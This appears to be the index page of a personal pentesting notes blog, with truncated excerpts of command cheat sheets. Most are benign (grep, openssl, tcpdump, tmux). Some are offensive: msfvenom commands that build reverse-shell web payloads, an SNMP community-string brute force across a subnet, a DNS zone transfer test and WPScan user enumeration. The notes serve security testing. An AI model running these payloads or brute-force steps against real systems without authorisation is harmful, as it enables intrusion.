Misc CMDs
Looping: for i in $(seq 0 10); do ls; done watch -n 1 ls -la watch -n 1 cat someting.txt Find Strings in files grep -H -i “Some Text Here” * -R | cut -d: -f1 | sort -u Grep… Continue Reading
Looping: for i in $(seq 0 10); do ls; done watch -n 1 ls -la watch -n 1 cat someting.txt Find Strings in files grep -H -i “Some Text Here” * -R | cut -d: -f1 | sort -u Grep… Continue Reading
Web Based Payloads PHP msfvenom -p php/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 -f raw > rshell.php ASP msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 -f asp > rshell.asp JSP msfvenom -p java/jsp_shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f raw > rshell.jsp WAR (Tomcat) msfvenom -p java/jsp_shell_reverse_tcp LHOST=x.x.x.x LPORT=4444… Continue Reading
Once we have found that there is a DNS ports (TCP 53/UDP 53) running on the target then we can use quick command below to test DNS zone transfer vulnerability. Zone Transfer technics dig axfr abc.com @nameserver nslookup> set type=any>… Continue Reading
1. Connect to specific port and show certificate detail $ openssl s_client -showcerts -connect www.saroot.net:443 2. Show certificate expire date $ echo | openssl s_client -connect www.saroot.net:443 2>/dev/null | openssl x509 -noout -dates 3. Certificate finger print $… Continue Reading
nmap -sU -p 161 –script=snmp-info.nse x.x.x.x -oN $target-nsmp-enum.nmap snmpenum -t x.x.x.x snmpcheck -t x.x.x.x -c public SMB Public Bruteforce echo public > community.txt; echo private >> community.txt for ip in $(seq 1 254);do echo 192.168.1.$ip;done > ip.txt onesixtyone -c community.txt… Continue Reading
Filter by destination IP and ports$ tcpdump -n “dst host 192.168.1.1 and dst port 23”$ tcpdump -n “dst host 192.168.1.1 and (dst port 23 or dst port 443)”$ tcpdump -n “dst net 192.168.10/24 and dst port 23”$ tcpdump -n “dst… Continue Reading
My notes on how to use tmux! (Prefix) + ? – Tmux Help(Prefix) + z – Zoom terminal(Prefix) + c – Create new windows(Prefix) + 0 – Goto windows #0(Prefix) + 1 – Goto windows #1(Prefix) + s – send… Continue Reading
Quick technics and tools for basic attacking WP websites: WPScan $ wpscan -u http://pentest.local/weblog/ –enumerate t –enumerate u $ wpscan -random-agent -u http://pentest.local –proxy 127.0.0.1:8080 Note : Don’t trust WPScan result, always check against Searchsploit for all plugins vulnerability!! Brute-forcing… Continue Reading
Hey Friends and Welcome! Sorry to anyone who are waiting to access the site. 🙂 I am planing to bring this website online very shortly and I will keep adding interesting and useful stuff in to it. This new site… Continue Reading